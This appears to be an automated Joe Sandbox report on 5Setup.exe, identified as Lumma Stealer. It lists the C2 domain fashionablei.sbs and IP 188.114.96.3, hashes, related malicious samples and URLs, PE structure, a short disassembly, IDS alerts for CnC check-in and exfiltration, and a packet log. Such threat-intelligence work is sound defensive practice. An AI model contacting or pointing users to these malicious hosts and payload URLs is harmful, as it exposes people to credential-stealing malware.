                                                                                                https://support.microsofBitLockerToGo.exe, 00000001.00000003.1919884934.00000000054D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  http://crt.rootca1.amazontrust.com/rootca1.cer0?BitLockerToGo.exe, 00000001.00000003.1947013541.00000000054A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#concurrency-cont5Setup.exefalse
                                                                                                    unknown
                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=BitLockerToGo.exe, 00000001.00000003.1920231842.00000000054B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    • No. of IPs < 25%
                                                                                                    • 25% < No. of IPs < 50%
                                                                                                    • 50% < No. of IPs < 75%
                                                                                                    • 75% < No. of IPs
                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                    188.114.96.3
                                                                                                    fashionablei.sbsEuropean Union
                                                                                                    13335CLOUDFLARENETUStrue
                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                    Analysis ID:1541177
                                                                                                    Start date and time:2024-10-24 14:41:07 +02:00
                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                    Overall analysis duration:0h 3m 57s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:full
                                                                                                    Cookbook file name:default.jbs
                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                    Number of analysed new started processes analysed:5
                                                                                                    Number of new started drivers analysed:0
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:0
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Sample name:5Setup.exe
                                                                                                    Detection:MAL
                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@3/0@1/1
                                                                                                    EGA Information:
                                                                                                    • Successful, ratio: 50%
                                                                                                    HCA Information:
                                                                                                    • Successful, ratio: 87%
                                                                                                    • Number of executed functions: 35
                                                                                                    • Number of non-executed functions: 87
                                                                                                    Cookbook Comments:
                                                                                                    • Found application associated with file extension: .exe
                                                                                                    • Stop behavior analysis, all processes terminated
                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                    • Execution Graph export aborted for target 5Setup.exe, PID 4960 because there are no executed function
                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                    • VT rate limit hit for: 5Setup.exe
                                                                                                    TimeTypeDescription
                                                                                                    08:42:18API Interceptor10x Sleep call for process: BitLockerToGo.exe modified
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    188.114.96.3Orden de Compra No. 78986756565344657.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                    • paste.ee/d/nwtkd
                                                                                                    Doc 784-01965670.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.launchdreamidea.xyz/bd77/
                                                                                                    PO1268931024 - Bank Slip.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                    • www.timizoasisey.shop/3p0l/
                                                                                                    BL.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.launchdreamidea.xyz/bd77/
                                                                                                    w49A5FG3yg.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                    • 733812cm.n9shteam.in/DefaultWordpress.php
                                                                                                    9XHFe6y4Dj.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                    • 733812cm.n9shteam.in/DefaultWordpress.php
                                                                                                    SecuriteInfo.com.Win32.MalwareX-gen.14607.6011.exeGet hashmaliciousUnknownBrowse
                                                                                                    • servicetelemetryserver.shop/api/index.php
                                                                                                    t1zTzS9a3r.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                    • abdulbek.top/externalvideoprotectdefaultsqlWindowsdlePrivate.php
                                                                                                    aQdB62N7SB.elfGet hashmaliciousShikitega, XmrigBrowse
                                                                                                    • main.dsn.ovh/dns/lovely
                                                                                                    QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                    • filetransfer.io/data-package/DyuQ5y15/download
                                                                                                    No context
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    CLOUDFLARENETUSsetup.msiGet hashmaliciousUnknownBrowse
                                                                                                    • 172.64.41.3
                                                                                                    https://1drv.ms/o/c/3e563d3fb2a98d1c/Emlo5KUbYYNEvKtIF-7SS0EBYSeT3hOOGuv_MbeT-n2y4g?e=HPjqUnGet hashmaliciousHtmlDropperBrowse
                                                                                                    • 104.21.45.155
                                                                                                    https://railrent-railrent.powerappsportals.com/Get hashmaliciousUnknownBrowse
                                                                                                    • 172.67.140.116
                                                                                                    https://2007.filemail.com/api/file/get?filekey=58mKUrTMdlmzqkRvo0UdVa2TMjJTCQiSNv5rUBtsDQTNU0dM4JzppUJaOrP_mWxCym0k9l5xEDeaXunPsHq6frY8XZH_gnclw86MefA3bpAlGuDkr77-xSqrMOQIlMdW5cRjwoOSCWIlTwpC48cNKMMHhMKp&track=P8fpm4ry&pk_vid=8a8b18f03738ae4f17297703684d559dGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 104.17.112.233
                                                                                                    attachment(1).emlGet hashmaliciousUnknownBrowse
                                                                                                    • 104.22.54.104
                                                                                                    PO%20K22012FA[1].docxGet hashmaliciousUnknownBrowse
                                                                                                    • 188.114.96.3
                                                                                                    https://email.email.pandadoc.net/c/eJxUkE9r4zwQxj-NdUuQR5ItHXQobfwG3rLQsmHbXspIGjeqE8m1FYfm0y-B7f65DcP8ht_zBOsa4XrNQvanI6XyGoPN-f7_7ilGN8iYdk8Pn-dxt_vOyNYtmMZwDpztLRpXK45GaGy9C943vK2NJgTDG-WQRQscZM1B1AJaztfS904pGYLuOTQtVZLTEeNhPWIKGLJfJyoszq9lQk_oDmTLdCJ2sPtSxrkSNxV0FXQ4jn8Qn48VdF_6FXQLVKIreaBUiTvSzgiJNQeJqLDhSoJpBAanJYFWrZO1kb6uRMdSLrGPHkvM6VqDaxuBBtpVCyBWEkW9wkbTCsko1-galQ4sT2-Y4uU39N85y5jEfDMn83C50P6beDlv2WTDe040V5K702Ggj9NhvKqziZY4_2J_iM3H6W67XV7Uop9j2dyq0D-yYr_S_TWuCk5v9M9mvl4sFtg5T8M8oqfrU_W4od1nvwdHIdy798HfDs_6ZwAAAP__1K2kLgGet hashmaliciousUnknownBrowse
                                                                                                    • 104.18.86.42
                                                                                                    Halkbank_Ekstre_20241022_081224_563756.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                    • 188.114.96.3
                                                                                                    REVISED INVOICE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                    • 188.114.96.3
                                                                                                    SIPARIS-290124.PDF.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                    • 188.114.97.3
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 188.114.96.3
                                                                                                    PO%20K22012FA[1].docxGet hashmaliciousUnknownBrowse
                                                                                                    • 188.114.96.3
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 188.114.96.3
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 188.114.96.3
                                                                                                    https://is.gd/6NgVrQGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 188.114.96.3
                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                    • 188.114.96.3
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 188.114.96.3
                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                    • 188.114.96.3
                                                                                                    g4Cyr2T5jq.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Stealc, VidarBrowse
                                                                                                    • 188.114.96.3
                                                                                                    file.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                    • 188.114.96.3
                                                                                                    No context
                                                                                                    No created / dropped files found
                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Entropy (8bit):6.438889818745099
                                                                                                    TrID:
                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                    File name:5Setup.exe
                                                                                                    File size:15'018'496 bytes
                                                                                                    MD5:535428c4f1622391fa1f79d1210a308e
                                                                                                    SHA1:f71f258f43d7734f92e6df408462c77db43e3ffa
                                                                                                    SHA256:624c18c86535bd12147f839b0b40e68d1596d12e8c20248bf164f331319a7edf
                                                                                                    SHA512:edbd349c87d6427986597068d5ae8710f2b79692cf42ac6756cae3d039934434b9ae69acf17ca1c0c8119c075b48e12f9930bb88b1087a89a24c4c3aa195561a
                                                                                                    SSDEEP:196608:4dgBg0nPLg8yalqxxvzMGsfdi/xVBpmR1hGPm:97zV0Jz6i/+GO
                                                                                                    TLSH:9DE64940F9CB44FAE907583190ABA27F63345D098B25DBC7EB457F6AF837791093A209
                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........................o..........9............@..................................}....@................................
                                                                                                    Icon Hash:497971328ce1634d
                                                                                                    Entrypoint:0x473910
                                                                                                    Entrypoint Section:.text
                                                                                                    Digitally signed:false
                                                                                                    Imagebase:0x400000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                    Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:
                                                                                                    OS Version Major:6
                                                                                                    OS Version Minor:1
                                                                                                    File Version Major:6
                                                                                                    File Version Minor:1
                                                                                                    Subsystem Version Major:6
                                                                                                    Subsystem Version Minor:1
                                                                                                    Import Hash:1aae8bf580c846f39c71c05898e57e88
                                                                                                    Instruction
                                                                                                    jmp 00007FAB9D221D40h
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    sub esp, 28h
                                                                                                    mov dword ptr [esp+1Ch], ebx
                                                                                                    mov dword ptr [esp+10h], ebp
                                                                                                    mov dword ptr [esp+14h], esi
                                                                                                    mov dword ptr [esp+18h], edi
                                                                                                    mov dword ptr [esp], eax
                                                                                                    mov dword ptr [esp+04h], ecx
                                                                                                    call 00007FAB9D1FD3A6h
                                                                                                    mov eax, dword ptr [esp+08h]
                                                                                                    mov edi, dword ptr [esp+18h]
                                                                                                    mov esi, dword ptr [esp+14h]
                                                                                                    mov ebp, dword ptr [esp+10h]
                                                                                                    mov ebx, dword ptr [esp+1Ch]
                                                                                                    add esp, 28h
                                                                                                    retn 0004h
                                                                                                    ret
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    sub esp, 08h
                                                                                                    mov ecx, dword ptr [esp+0Ch]
                                                                                                    mov edx, dword ptr [ecx]
                                                                                                    mov eax, esp
                                                                                                    mov dword ptr [edx+04h], eax
                                                                                                    sub eax, 00010000h
                                                                                                    mov dword ptr [edx], eax
                                                                                                    add eax, 00000BA0h
                                                                                                    mov dword ptr [edx+08h], eax
                                                                                                    mov dword ptr [edx+0Ch], eax
                                                                                                    lea edi, dword ptr [ecx+34h]
                                                                                                    mov dword ptr [edx+18h], ecx
                                                                                                    mov dword ptr [edi], edx
                                                                                                    mov dword ptr [esp+04h], edi
                                                                                                    call 00007FAB9D2241A4h
                                                                                                    cld
                                                                                                    call 00007FAB9D22322Eh
                                                                                                    call 00007FAB9D221E69h
                                                                                                    add esp, 08h
                                                                                                    ret
                                                                                                    jmp 00007FAB9D224050h
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    mov ebx, dword ptr [esp+04h]
                                                                                                    mov ebp, esp
                                                                                                    mov dword ptr fs:[00000034h], 00000000h
                                                                                                    mov ecx, dword ptr [ebx+04h]
                                                                                                    cmp ecx, 00000000h
                                                                                                    je 00007FAB9D224051h
                                                                                                    mov eax, ecx
                                                                                                    shl eax, 02h
                                                                                                    sub esp, eax
                                                                                                    mov edi, esp
                                                                                                    mov esi, dword ptr [ebx+08h]
                                                                                                    cld
                                                                                                    rep movsd
                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xe330000x44c.idata
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xe840000x4edc.rsrc
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xe340000x4ebf0.reloc
                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0xd5a9000xb4.data
                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                    .text0x10000x6fe8680x6fea0097c0c8509a6b1f968425c6818412d0f3unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                    .rdata0x7000000x6581b80x65820079f4f28dd48bd351d652e5476cb2f7a9unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    .data0xd590000xd9b780xa76004ce0fa36a8c078f08ea9adde6c897872False0.42130175270724424data6.174132406128503IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    .idata0xe330000x44c0x60036cd91329e192ab53013cf542b9d2327False0.357421875OpenPGP Public Key3.860585918641242IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    .reloc0xe340000x4ebf00x4ec00c35eb9cc3646caa31f1c994999cedbb1False0.5779637896825397data6.6433460216534925IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                    .symtab0xe830000x40x20007b5472d347d42780469fb2654b7fc54False0.02734375data0.020393135236084953IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                    .rsrc0xe840000x4edc0x5000c2be3677d4e7076809476de08e3b4e27False0.14755859375data4.136539305625679IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                    RT_ICON0xe842680x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.21808510638297873
                                                                                                    RT_ICON0xe846d00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.099906191369606
                                                                                                    RT_ICON0xe857780x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.06109958506224066
                                                                                                    RT_ICON0xe87d200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 6400.42473118279569894
                                                                                                    RT_ICON0xe880080x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 6400.35618279569892475
                                                                                                    RT_GROUP_ICON0xe882f00x30data0.8125
                                                                                                    RT_GROUP_ICON0xe883200x14data1.2
                                                                                                    RT_GROUP_ICON0xe883340x14data1.25
                                                                                                    RT_VERSION0xe883480x3ecdata0.4252988047808765
                                                                                                    RT_MANIFEST0xe887340x528XML 1.0 document, ASCII text, with CRLF line terminators0.4643939393939394
                                                                                                    RT_MANIFEST0xe88c5c0x280XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.553125
                                                                                                    DLLImport
                                                                                                    kernel32.dllWriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateEventA, CloseHandle, AddVectoredExceptionHandler
                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                    EnglishUnited States
                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                    2024-10-24T14:42:20.261247+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449736188.114.96.3443TCP
                                                                                                    2024-10-24T14:42:20.261247+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449736188.114.96.3443TCP
                                                                                                    2024-10-24T14:42:23.149975+02002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449737188.114.96.3443TCP
                                                                                                    2024-10-24T14:42:23.149975+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449737188.114.96.3443TCP
                                                                                                    2024-10-24T14:42:31.244380+02002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449743188.114.96.3443TCP
                                                                                                    2024-10-24T14:42:33.574427+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449745188.114.96.3443TCP
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Oct 24, 2024 14:42:19.087707996 CEST49736443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:19.087747097 CEST44349736188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:19.087825060 CEST49736443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:19.090976954 CEST49736443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:19.091001987 CEST44349736188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:19.701432943 CEST44349736188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:19.701622009 CEST49736443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:19.707482100 CEST49736443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:19.707514048 CEST44349736188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:19.707801104 CEST44349736188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:19.757798910 CEST49736443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:19.776190042 CEST49736443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:19.776228905 CEST49736443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:19.776352882 CEST44349736188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:20.261246920 CEST44349736188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:20.261347055 CEST44349736188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:20.261467934 CEST49736443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:20.332714081 CEST49736443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:20.332751036 CEST44349736188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:20.332768917 CEST49736443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:20.332777023 CEST44349736188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:21.055686951 CEST49737443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:21.055726051 CEST44349737188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:21.055850983 CEST49737443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:21.056396961 CEST49737443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:21.056408882 CEST44349737188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:21.681751013 CEST44349737188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:21.681838989 CEST49737443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:21.683244944 CEST49737443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:21.683257103 CEST44349737188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:21.683470964 CEST44349737188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:21.685017109 CEST49737443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:21.685039043 CEST49737443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:21.685081005 CEST44349737188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:23.149959087 CEST44349737188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:23.150041103 CEST44349737188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:23.150072098 CEST44349737188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:23.150099993 CEST44349737188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:23.150122881 CEST49737443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:23.150129080 CEST44349737188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:23.150139093 CEST44349737188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:23.150141001 CEST49737443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:23.150185108 CEST49737443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:23.150198936 CEST44349737188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:23.150235891 CEST44349737188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:23.150330067 CEST49737443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:23.150338888 CEST44349737188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:23.156081915 CEST44349737188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:23.156107903 CEST44349737188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:23.156137943 CEST49737443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:23.156146049 CEST44349737188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:23.156155109 CEST44349737188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:23.156199932 CEST49737443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:23.156208038 CEST44349737188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:23.156234026 CEST44349737188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:23.156254053 CEST49737443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:23.156286955 CEST49737443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:23.156485081 CEST49737443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:23.156502008 CEST44349737188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:23.156537056 CEST49737443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:23.156543970 CEST44349737188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:23.310636997 CEST49738443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:23.310698032 CEST44349738188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:23.310802937 CEST49738443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:23.311086893 CEST49738443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:23.311124086 CEST44349738188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:23.936871052 CEST44349738188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:23.937089920 CEST49738443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:23.938390017 CEST49738443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:23.938414097 CEST44349738188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:23.938746929 CEST44349738188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:23.939878941 CEST49738443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:23.940047026 CEST49738443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:23.940085888 CEST44349738188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:23.940152884 CEST49738443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:23.940161943 CEST44349738188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:24.601485968 CEST44349738188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:24.601555109 CEST44349738188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:24.601866961 CEST49738443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:24.601867914 CEST49738443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:24.688050032 CEST49739443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:24.688093901 CEST44349739188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:24.688175917 CEST49739443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:24.688486099 CEST49739443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:24.688497066 CEST44349739188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:24.914093971 CEST49738443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:24.914167881 CEST44349738188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:25.311800003 CEST44349739188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:25.311944962 CEST49739443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:25.313153028 CEST49739443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:25.313158989 CEST44349739188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:25.313483000 CEST44349739188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:25.314753056 CEST49739443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:25.314867020 CEST49739443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:25.314894915 CEST44349739188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:25.876744986 CEST44349739188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:25.876869917 CEST44349739188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:25.876928091 CEST49739443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:25.877010107 CEST49739443192.168.2.4188.114.96.3
